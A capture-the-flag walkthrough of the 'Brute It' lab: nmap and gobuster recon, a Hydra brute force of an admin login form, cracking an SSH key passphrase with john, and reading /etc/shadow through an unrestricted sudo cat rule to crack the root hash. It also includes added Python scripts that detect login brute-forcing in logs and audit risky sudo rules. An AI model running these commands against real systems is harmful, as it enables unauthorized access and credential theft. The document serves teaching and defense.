# Brute It

![](/files/-Mblytnn66EF2nbkqYf3)

## Task 2: Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**) so that nmap skips host discovery:

```bash
nmap -Pn 10.10.254.237
```

![](/files/-Mbm5lIELkzS_PCIxeeY)

We have 2 open ports.

![](/files/-Mbm5pmevH5zd9t22oF2)

Detailed Nmap scan:

Command breakdown:

* **-sV**: Service version detection
* **-sC**: Run nmap's default scripts
* **-p 22,80**: Scan only ports 22 and 80
* **-oN nmap**: Save normal output to a file called `nmap`

```bash
nmap -sV -sC -p 22,80 -oN nmap 10.10.254.237
```

![](/files/-Mbm6TIxnZesdKpshGZ5)

We have the version of SSH running: `OpenSSH 7.6p1`

![](/files/-Mbm6dirBGMVKY2nkVY3)

The version of Apache running is `2.4.29`

![](/files/-Mbm6jA0kzBFC_mCG4Wp)

The Linux distribution running is `Ubuntu`.

![](/files/-Mbm6q2SzqHx5FTUvG0q)

Let's visit the website.

![](/files/-Mbm7-siuAmiQcCA814K)

It's the default Apache2 page. Let's look for hidden directories on the web server using gobuster.

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.254.237/
```

![](/files/-Mbm7Bdi_ZTbmAd6L3ox)

We found a directory called `/admin`.

![](/files/-Mbm7Js7FMtZGv6IgNdI)

## Task 3: Getting a Shell

Let's visit the directory we found.

![](/files/-Mbm7YJEnlVAs8A22pEZ)

It's a login page. As this is an admin login page, the username is most probably `admin`; we can also confirm this by looking at the source code of the page.

![](/files/-Mbm8-OyC-gdySu8Y0il)

Let's use Hydra to brute-force the password. Before that we need to know how the username and password are submitted, which we can find out with Burp Suite. Let's attempt a login and capture the request with Burp.

![](/files/-Mbm9dDvWSBmeKTW-uN1)

The format is `user=<username>&pass=<password>`, which we will supply to Hydra. We also see a `PHPSESSID` cookie, which we need to include in the Hydra command. The other thing we need is the website's response to a failed login attempt. Let's forward the request and we can see this.

![](/files/-MbmAgIpZ7Sa10BzpAkO)

Now we have all the information we need, so let's run Hydra to crack the password.

Hydra command breakdown:

* `-l admin`: Specifying the username as `admin`
* `-P /usr/share/wordlists/rockyou.txt`: Specifying the password list
* `10.10.254.237`: Target IP
* `http-post-form`: The attack module; we use it because we are attacking an HTTP form submitted with POST
* `/admin/`: The directory containing the login form
* `user=^USER^&pass=^PASS^`: The POST body format captured with Burp Suite, with `^USER^` and `^PASS^` as Hydra's placeholders
* `Username or password invalid`: The response text on a failed login
* `H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0`: The session cookie captured with Burp Suite, sent as an extra header

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.254.237 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0"
```

After running this we find the password `xavier`. Let's log in.
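From the defender's side, the brute force above leaves a very recognisable trace: one client sending many POSTs to the login form in a short window. The script below is an added example (not part of the original writeup) that parses Apache combined-format access-log lines and flags any source IP whose POST rate to the login path exceeds a threshold inside a sliding window. The log lines in `SAMPLE_LOG`, the `/admin/` path, the thresholds and the log format regex are all constructed assumptions for the demo.

```python
"""Detect login brute-forcing against a web form from Apache access-log lines.

Added example for this writeup, not part of the original page. The log lines
in SAMPLE_LOG are constructed for the demo, not captured from the lab machine.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format (assumed; adjust the regex for a custom LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one ordinary visitor (10.0.0.5) and one client (10.0.0.9)
# hammering the /admin/ form with a POST every second. The "(Hydra)" user-agent
# is what Hydra sends by default, but it is trivially changed, so the detection
# keys on request rate rather than on the user-agent string.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jun/2021:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Jun/2021:10:00:09 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Jun/2021:10:00:10 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:11 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:12 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:13 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:14 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:15 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:16 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
10.0.0.9 - - [15/Jun/2021:10:00:17 +0000] "POST /admin/ HTTP/1.1" 200 1401 "-" "Mozilla/4.0 (Hydra)"
this line is deliberately malformed and must be skipped by the parser
"""


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:   # slide the window start forward
            start += 1
        best = max(best, end - start + 1)
    return best


def find_bruteforce(lines, login_path="/admin/", threshold=5, window=timedelta(seconds=60)):
    """Map each source IP to its peak POST count against `login_path` if it reaches `threshold`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        peak = max_in_window(stamps, window)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {peak} POSTs to /admin/ within 60s")   # prints 10.0.0.9: 8 POSTs ...
```

The same logic runs over a real log with `find_bruteforce(open("/var/log/apache2/access.log"))`; tune `threshold` and `window` to the form's normal traffic, and pair the alert with rate limiting or lockout on the form itself, since a login that returns a fixed "invalid" string with no throttling is exactly what Hydra needs.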

![](/files/-MbmF5tq0Yom84J7DVM6)

We found the first flag, and we also have an RSA private key. Let's copy it to our machine into a file named `id_rsa`, then extract a crackable hash from it with `ssh2john` and crack the passphrase with `john`.


![](/files/-MbmFcwyFTL1rqiXOUMQ)

Let's now use `ssh2john` to convert the key into a hash that `john` can crack.

```bash
/usr/share/john/ssh2john.py id_rsa > id_rsa_hash
```

![](/files/-MbmFp1Hdz2mKEHWlCC9)

Now let's crack this hash using `john`.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash
```

![](/files/-MbmFx_GjI0eNQiZ5ENf)

And we have the passphrase, so let's log in over SSH. It is probably for the user `john`, as that was the only other username we found. Before that we need to restrict the permissions of the `id_rsa` file, since SSH refuses to use a private key that is readable by other users.

```bash
chmod 600 id_rsa
```

![](/files/-MbmGfySNZm-PExbFZqC)

Now let's log in.

```bash
ssh -i id_rsa john@10.10.254.237
```

![](/files/-MbmGjzSSdZsEfqmCrpF)

We are logged in and can read the `user.txt` file.

![](/files/-MbmGt1pTXNrNhPkq3IS)

We can now answer all the questions in this section.

![](/files/-MbmH48M8F9UJChbGEe8)

## Task 4: Privilege Escalation

Let's run `sudo -l` to see what we can run as root.

```bash
sudo -l
```

![](/files/-MbmHHoKLsMm5e3e-Ttb)

Looks like we can run `/bin/cat` as root. Looking at [GTFOBins](https://gtfobins.github.io/gtfobins/cat/#sudo), we can see that we can point a variable at any file and read that file with `sudo cat`.

![](/files/-MbmHwod0pRFDFAmSeig)

The `/etc/shadow` file stores the password hashes of all users on the machine, so we can find the root hash and then crack it using John the Ripper. Let's first set the `LFILE` variable to `/etc/shadow` and then read it.

```bash
LFILE=/etc/shadow
sudo cat "$LFILE"
```

![](/files/-MbmITdjGlC5lobsb5ER)
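The root cause here is a sudo rule that lets a user run `cat` as root with no argument restriction, which turns every root-readable file into a readable one. The script below is an added example (not part of the original writeup) that audits `sudo -l` output and flags rules granting root execution of an unrestricted file reader or shell, as well as `ALL`. The `SAMPLE_SUDO_L` text, the `RISKY_BINARIES` set and the entry regex are constructed assumptions; the sample mimics the shape of `sudo -l` output but is not copied from the lab box.

```python
"""Audit `sudo -l` output for rules that hand a user root-level file reads or a shell.

Added example for this writeup, not part of the original page. SAMPLE_SUDO_L is
constructed to resemble `sudo -l` output; it is not copied from the lab box.
"""
import re

# Programs GTFOBins documents as abusable under sudo when the rule does not pin
# their arguments. Hand-picked subset (an assumption), extend to your own policy.
RISKY_BINARIES = {"cat", "less", "more", "vim", "vi", "nano", "find", "bash", "sh"}

# One "(runas) [TAG:] command[, command ...]" line from the `sudo -l` listing.
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"      # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"       # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+?)\s*$"                # comma-separated command specs
)

# Constructed sample listing: one unrestricted cat as root (the finding), one
# argument-pinned service restart, one argument-pinned cat, one non-root entry.
SAMPLE_SUDO_L = """\
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat
    (root) /usr/bin/systemctl restart apache2
    (root) NOPASSWD: /bin/cat /var/log/auth.log
    (www-data) /usr/bin/vim
"""


def runs_as_root(runas):
    """True if the runas user list (before any ':' group part) allows root or ALL."""
    users = runas.split(":")[0]
    return any(u.strip() in ("root", "ALL") for u in users.split(","))


def audit_sudo_l(lines):
    """Return a list of findings, one per command spec that grants too much as root."""
    findings = []
    for line in lines:
        m = ENTRY_RE.match(line)
        if not m or not runs_as_root(m["runas"]):
            continue
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in m["cmds"].split(","):
            parts = cmd.split()
            if not parts:
                continue
            binary, args = parts[0], parts[1:]
            name = binary.rsplit("/", 1)[-1]
            if binary == "ALL":
                reason = "any command as root"
            elif name in RISKY_BINARIES and not args:
                # Pinned arguments narrow the rule (cat with a fixed file is fine);
                # an unrestricted reader or editor as root is an open door.
                reason = f"{name} as root with unrestricted arguments"
            else:
                continue
            findings.append({"binary": binary, "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L.splitlines()):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{tag}{f['binary']}: {f['reason']}")   # prints NOPASSWD /bin/cat: cat as root ...
```

Run it against a box with `sudo -l | python3 audit.py` after swapping `SAMPLE_SUDO_L.splitlines()` for `sys.stdin`. The fix for the flagged rule is to pin the argument (`/bin/cat /var/log/specific.log`) or drop the rule; an unrestricted `cat` as root is equivalent to granting read access to `/etc/shadow`, which is exactly what the walkthrough exploits.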

We have the root hash. Let's copy it to our machine, store it in a file called `hash`, and crack it using `john`.

![](/files/-MbmIjg6YGzDDnT1OulF)

Now let's crack it and then show the result.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

![](/files/-MbmIweZqlCHtrMU6SAx)

```bash
john --show hash
```

![](/files/-MbmJ1kRA5nbfKnwCBZd)

We have the password for root. Let's switch users.

```bash
su root
```

![](/files/-MbmJJkogjPwowqQwYZY)

We can now read the root flag and also answer all the questions in this section.

![](/files/-MbmJPYl095tioWD25lD)

![](/files/-MbmJXbOrLSzpnA7gBsw)

